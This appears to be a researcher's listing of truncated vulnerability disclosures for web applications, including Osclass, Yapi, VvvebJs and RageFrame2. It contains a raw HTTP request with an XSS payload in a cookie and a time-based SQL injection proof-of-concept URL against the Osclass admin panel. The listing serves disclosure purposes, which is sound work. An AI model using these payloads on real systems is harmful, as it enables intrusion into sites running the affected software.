JiaSheng He
```
GET /index.php?user/login HTTP/1.1
Host: 192.168.160.130:6699
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: APP_HOST=http://192.168.160.130:6699/">alert(9876)
Upgrade-Insecure-Requests: 1
```
...
### Vulnerability report **Description** Attackers can pass malicious URLs as parameters to the pingback.ping method by constructing malicious requests. The first parameter in this method allows passing any URL, and...
### **Summary** Osclass 5.1.2 has a SQL Injection Vulnerability. ### **Details** An attacker with administrator rights can execute commands through SQL injection. ### **Proof of Concept (POC)** ``` GET /oc-admin/index.php?b_active=(select(0)from(select(sleep(4)))v)&b_enabled=0&b_premium=1&b_spam=1&catId=10&city=San%20Francisco&cityId=San%20Francisco&countryId=USA&countryName=hebing123&direction=desc&iDisplayLength=10&page=items&region=NY&regionId=NY&sSearch=the&sort=date&user=hebing123&userId=hebing123...
# Summary A stored XSS vulnerability exists in Yapi 1.10.2 (2021-10-13) which allows attackers to execute arbitrary HTML code. # Details In the advanced expectation, the user can execute any...
# **Summary** VvvebJs version 1.7.4 exhibits an arbitrary file upload vulnerability. An attacker can exploit this vulnerability to upload malicious files onto the server, potentially leading to the execution of...
### Summary VvvebJs 1.7.4 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the user's browser by inducing the user to click on a link...
### Summary RageFrame2 2.6.43 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the admin's browser by inducing the admin to click on a link...
### Summary RageFrame2 2.6.43 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the admin's browser by inducing the admin to click on a link...
### Summary RageFrame2 2.6.43 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the admin's browser by inducing the admin to click on a link...
### Summary RageFrame2 2.6.43 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the admin's browser by inducing the admin to click on a link...